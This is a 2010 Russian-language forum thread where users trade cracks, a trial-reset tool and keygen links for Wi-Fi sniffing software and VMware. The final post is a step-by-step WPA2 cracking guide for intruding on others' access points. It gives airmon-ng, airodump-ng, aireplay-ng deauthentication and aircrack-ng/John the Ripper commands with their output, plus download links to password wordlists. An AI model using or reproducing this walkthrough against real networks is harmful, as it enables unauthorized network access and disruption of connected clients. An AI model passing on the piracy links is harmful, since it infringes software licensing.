niku49
Новичок
Сообщений: 7
|
|
« Ответ #30 : 26 Июля 2010, 20:15:01 »
|
|
Приобрёл новый нотбук с внутренним адаптером Intel(R)Wireless WiFi Link4965AGN.
Этот адаптер совместим с прог.CommView for WiFi 6.2 или .CommView for WiFi 6.3
Программа CommView for WiFi 6.3 работает отлично.Помогите найти сrack k одной из этих прог.Буду очень признателен.
|
|
|
Записан |
|
|
|
nik-semya
Пользователь
Сообщений: 76
|
|
« Ответ #31 : 26 Июля 2010, 20:47:35 »
|
|
Пока только к версии 6.1 встречается лекарство, попробуй сделать так- установи версию 6.2 и пусть она тебе драйвера установит на карту, далее удали прогу, но дрова оставь, и потом ставь версию проги 6.1 патченую или 6.0 должна заработать с твоей картой после таких манипуляций
|
|
« Последнее редактирование: 26 Июля 2010, 21:01:29 от nik-semya » |
Записан |
|
|
|
nik-semya
Пользователь
Сообщений: 76
|
|
« Ответ #32 : 27 Июля 2010, 12:50:07 »
|
|
Вот тут и тут лежит прога для сброса триала (Ограничения на 30 дней) для всех версий Commview for WiFi (Проверено на Windows XP)
|
|
« Последнее редактирование: 05 Сентября 2010, 21:31:44 от nik-semya » |
Записан |
|
|
|
niku49
Новичок
Сообщений: 7
|
|
« Ответ #33 : 27 Июля 2010, 18:02:28 »
|
|
Ув. nik-semya подскажите пожалуйста (кратко),как пользоваться этой программой, вернее как убрать триал
|
|
|
Записан |
|
|
|
nik-semya
Пользователь
Сообщений: 76
|
|
« Ответ #34 : 27 Июля 2010, 21:04:12 »
|
|
Запускаешь и при первом ее запуске далее в окошке жми что то вроде I Agree или Ок и всё запускай коммвью, через 30 дней повтори процедуру
|
|
|
Записан |
|
|
|
niku49
Новичок
Сообщений: 7
|
|
« Ответ #35 : 28 Июля 2010, 22:47:12 »
|
|
Скачал эту прогу по продлению триала но к сожалению у меня она не пошла.На компе стоит виндос 7.
Однако ,если прога и сработало-бы, она не решило проблему так,как оценочная версия СоmmView for WiFi позволяет записать не более
20 тыс. пакетов.В инете встречал инфо ,что якобы существует кряк на СоmmView for WiFi версия 6.2
|
|
|
Записан |
|
|
|
nik-semya
Пользователь
Сообщений: 76
|
|
« Ответ #36 : 29 Июля 2010, 00:35:34 »
|
|
Может и есть но я не нашел кроме этого ничего
|
|
|
Записан |
|
|
|
nik-semya
Пользователь
Сообщений: 76
|
|
« Ответ #37 : 01 Августа 2010, 21:29:41 »
|
|
WinAircrack русифицированный тут
|
|
|
Записан |
|
|
|
nik-semya
Пользователь
Сообщений: 76
|
|
« Ответ #38 : 05 Августа 2010, 07:39:21 »
|
|
Народ кому надо держите русификатор для AiroWizard тут, кидайте его в папку с прогой и соглашайтесь на замену
|
|
« Последнее редактирование: 03 Сентября 2010, 23:52:46 от nik-semya » |
Записан |
|
|
|
Rhydaydot
Новичок
Сообщений: 7
[url=http://services.my-addr.com/verify-email-list-online.php]email list verification[/url]
|
|
« Ответ #39 : 07 Августа 2010, 09:45:40 »
|
|
-XXXXXX-, как ты можеш утверждать что твоя программа более расширеная, если не знаеш какую юзаю я? это не трой случайно?
|
|
|
Записан |
group email verify
|
|
|
Zabava23
Новичок
Сообщений: 1
|
|
« Ответ #40 : 12 Августа 2010, 14:31:59 »
|
|
Всем привет може кто выложит повторно? А то куда то загрузка битая , а загрузчик куда то пропал ! последуйте моему мануалу http://turbobit.net/rsg4k4bd39hq.html
|
|
|
Записан |
|
|
|
randomizr
|
|
« Ответ #41 : 29 Августа 2010, 16:13:32 »
|
|
clone cd порит болвани только так.Теперь использую imgburn если что-то не то она сразу пишет и болвань не поганит
|
|
|
Записан |
Мой сайт с учебными материалами.
|
|
|
kozel747
Новичок
Сообщений: 43
|
|
« Ответ #42 : 18 Ноября 2010, 13:47:01 »
|
|
кому напряжно пользоваться программами для взлома АП купитеhttp://www.wifirobin.com/free-network правда ломает только wep зато никаких заморочек никаких программ утанавливать не нужно(купил ,опробовал,всё работает как и утверждают проиводители)но мне интереснее самому.кто купит спрашивайте что и как ,сейчас сижу курочу эту штуку может что-то ещё вытащу.
|
|
|
Записан |
|
|
|
kozel747
Новичок
Сообщений: 43
|
|
« Ответ #43 : 27 Ноября 2010, 00:34:45 »
|
|
вот вам live-cd всего 45мб всё что нужно для взлома wi-fi никаких команд вводить не нужно,щёлкайте мышкой где нужно и всё, в архиве видео как им пользоваться.
Commview рядом не стоял по сравнению с этим , поверьте.запишите образ на болванку или запускайте с VMware как я. http://turbobit.net/quet9unne87z.html да кто хочет VMware скачайте с оф.сайта а здесь кейген http://turbobit.net/mzlyk75d1dfe.html
|
|
|
Записан |
|
|
|
kozel747
Новичок
Сообщений: 43
|
|
« Ответ #44 : 28 Ноября 2010, 00:18:22 »
|
|
взлом WPA.
Я буду использовать Dlink DWL-G122 (USB), беспроводной сетевой интерфейс для этой процедуры. В backtrack4, это устройство признано wlan0.
Во-первых, поставить карту в режиме мониторинга:
...............................................................
root@bt:~# airmon-ng
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
...............................................................
root@bt:~# airmon-ng start wlan0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
(monitor mode enabled on mon0)
................................................................
Хорошо, теперь мы можем использовать интерфейс mon0
Давайте найдём беспроводную сеть, которая использует WPA2 / PSK
.................................................................
root@bt:~# airodump-ng mon0
CH 6 ][ Elapsed: 4 s ][ 2009-02-21 12:57
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:5B:52:AD:F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Rate Lost Packets Probe
00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -29 0- 1 12 4 TestNet
.....................................................................
Остановим airodump-ng (ctrl+c) и запустим его снова,что-бы записать все пакеты на диск
.....................................................................
airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2
........................................................................
На данный момент, у вас есть 2 варианта: либо ждать, пока клиент подключится и 4-handshake будет полным, или deauthenticate существующих клиентов и таким образом заставить AP reassociate. Время-деньги, так что давайте заставим силой deauthenticate. Мы должны запустить aireplay-ng введя BSSID ЗС (-а) и МАС подключенного клиента (-с)
.........................................................................
root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
13:04:19 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
13:04:20 Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]
.............................................................................
Как результат, airodump-ng укажeт "WPA Handshake:" в верхнем правом углу
..............................................................................
CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Rate Lost Packets Probe
00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230
................................................................................
Остановитe airodump-ng и убедитесь, что файлы были созданы правильно
...............................................................................
root@bt:/# ls /tmp/wpa2* -al
-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap
-rw-r--r-- 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01.csv
-rw-r--r-- 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv
................................................................................
Есть 2 способа bruteforcing: один, который относительно быстр, но не гарантирует успеха и тот, который идет очень медленно, но гарантирует, что вы найдете ключ через определенный момент времени.
Первый вариант является использованием рабочего списка / dictionary file. Многие из этих файлов можно найти в Интернете, либо могут быть получены с помощью таких инструментов, как John the Ripper. Как только список слов будет создан, все что вам нужно сделать, это запустить Aircrack-ng подставив файл с Handshake и словарь word.txt
................................................................................
aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap
--------------------------------------------------------------------------------
Второй метод (bruteforcing) будет успешным наверняка, но это может занять много времени , чтобы закончить. Имейте в виду, WPA2 ключ может быть до 64 символов, так что в теории что-бы построить все сочетания паролей со всеми возможными наборами символов и скормить их в Aircrack займёт много времени. Если вы хотите использовать John The Ripper для создания всех возможных комбинаций паролей и скормить их в Aircrack-NG, это команда для использования:
..................................................................................
root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap
.................................................................................
каждый символ в ключе может иметь 26 +26 +10 (62) возможных комбинаций. Так максимальное число комбинаций, которое должно быть проверено в процессе перебора 62 * 62 * 62 * 62 * 62 * 62 * 62 * 62 = 218 340 105 584 896 около 600 ключей в секунду на моем "медленном" аппарате, может занять более 101083382 часов, чтобы найти ключ (11539 года). Так что думайте об этом, когда ломаете WPA
----------------------------------------------------------------------------------------------------------------
вот вам в помощь несколько словарей
ComboFile http://turbobit.net/m15prul3v4vt.html
de-ice.net-1.110-1.0 http://turbobit.net/8jsypdjdkctf.html
de-ice.net-1.100-1.1 http://turbobit.net/ej38m25xhrmt.html
de-ice.net-2.100-1.1.part1 http://turbobit.net/0g2yjp1y77df.html
de-ice.net-2.100-1.1.part2 http://turbobit.net/7cbyz8sxarh7.html
роутеры и модемы Password List 2010-02-04 http://turbobit.net/fomdazyfg5ou.html
theargonlistver1 http://turbobit.net/kjf1h2eoyb46.html
webster-dictionary http://turbobit.net/2xhh12xca0cy.html
wpalist http://turbobit.net/700uk6nvpren.html
|
|
|
Записан |
|
|
|
|